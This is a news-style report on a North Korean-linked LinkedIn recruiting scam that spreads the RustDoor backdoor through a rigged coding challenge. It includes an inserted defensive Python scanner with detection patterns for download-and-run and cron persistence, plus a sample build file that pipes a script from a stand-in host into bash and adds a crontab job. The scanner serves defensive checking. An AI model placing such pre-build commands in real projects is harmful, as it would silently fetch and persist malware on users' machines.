Cybersecurity researchers have warned about a new threat from North Korean-backed hackers targeting LinkedIn users to deliver malware called RustDoor. The latest advisory comes from Jamf Threat Labs, which detected an attack attempt in which a user was contacted on the professional social network by someone claiming to be a recruiter for a legitimate cryptocurrency exchange.
The malicious activity is part of a multi-pronged campaign aimed at infiltrating networks under the pretext of conducting interviews or coding assignments. The financial and cryptocurrency sectors are among the top targets, with state-sponsored adversaries seeking to generate illicit revenues and meet evolving objectives based on the regime’s interests.
The attacks manifest as highly tailored social engineering campaigns aimed at employees of decentralized finance (DeFi) and cryptocurrency businesses. One notable indicator is requests to execute code or download applications on company-owned devices, while another aspect involves requests for pre-employment tests or debugging exercises that involve executing unknown Node.js packages or scripts.
Jamf detected an attack chain where a victim was tricked into downloading a Visual Studio project as part of a coding challenge, which embedded bash commands to download two payloads: RustDoor (also known as Thiefbucket) and zsh_env. The malware is designed to persist via cron jobs on macOS devices.
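A defender-side pre-execution check, added here as an example and not part of the original report or of Jamf's tooling: it walks an unzipped "coding challenge" project and flags build-file content that would fetch and run remote code or install a cron job, the two behaviours described above. The indicator patterns, the file-extension list and the sample .csproj are constructed assumptions.

```python
"""Pre-execution audit of a downloaded coding-challenge project (added example)."""
import os
import re

# Indicators of a download-and-run stage in build files (assumed heuristics).
SUSPICIOUS = {
    "remote_fetch": re.compile(r"\b(curl|wget)\b.*https?://", re.I),
    "pipe_to_shell": re.compile(r"\|\s*(ba|z)?sh\b"),
    "decode_payload": re.compile(r"base64\s+(-d|-D|--decode)"),
    "make_executable": re.compile(r"\bchmod\s+[0-7]*\+?x"),
    "cron_persistence": re.compile(r"\bcrontab\b|/etc/cron|\blaunchctl\b"),
}
# Project and script files that can carry shell commands when built or opened.
SCAN_EXT = {".sh", ".zsh", ".csproj", ".vcxproj", ".pbxproj", ".targets",
            ".props", ".json", ".xml", ".py", ".js"}

def scan_text(text):
    """Return (indicator, line_no, line) for every line matching an indicator."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for name, rx in SUSPICIOUS.items():
            if rx.search(line):
                hits.append((name, n, line.strip()))
    return hits

def scan_project(root):
    """Map each flagged file under root to its hits; unreadable files are skipped."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for f in files:
            if os.path.splitext(f)[1].lower() not in SCAN_EXT:
                continue
            path = os.path.join(dirpath, f)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
            except OSError:
                continue
            if hits:
                findings[path] = hits
    return findings

# Constructed sample of a pre-build step that fetches a script and adds a cron job.
SAMPLE_CSPROJ = """<Project>
  <Target Name="PreBuild" BeforeTargets="Build">
    <Exec Command="curl -fsSL https://example.invalid/setup.sh | bash" />
    <Exec Command="(crontab -l; echo '* * * * * ~/.helper') | crontab -" />
  </Target>
</Project>"""
```

Call `scan_text(SAMPLE_CSPROJ)` to see the three hits on the embedded sample, or `scan_project("/path/to/unzipped/project")` before opening a received project in an IDE that may run pre-build steps.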
RustDoor is a previously documented backdoor for macOS, first seen in February 2024 targeting cryptocurrency firms. A Golang variant dubbed GateDoor was also discovered for Windows machines.
The findings from Jamf are significant as they mark the first time RustDoor has been formally attributed to North Korean threat actors, and they highlight the use of the Objective-C programming language. The tactics and techniques used in the campaign align closely with other cyber activity coming from the DPRK over the past couple of years.
VisualStudioHelper, another payload, is designed to act as an information stealer by harvesting files specified in the configuration. Both payloads operate as a backdoor, using different servers for command-and-control (C2) communications.
The researchers emphasized the importance of training employees, including developers, to be cautious when receiving requests from unknown sources on social media and not running software without thorough verification.
Source: https://thehackernews.com/2024/09/north-korean-hackers-target.html?m=1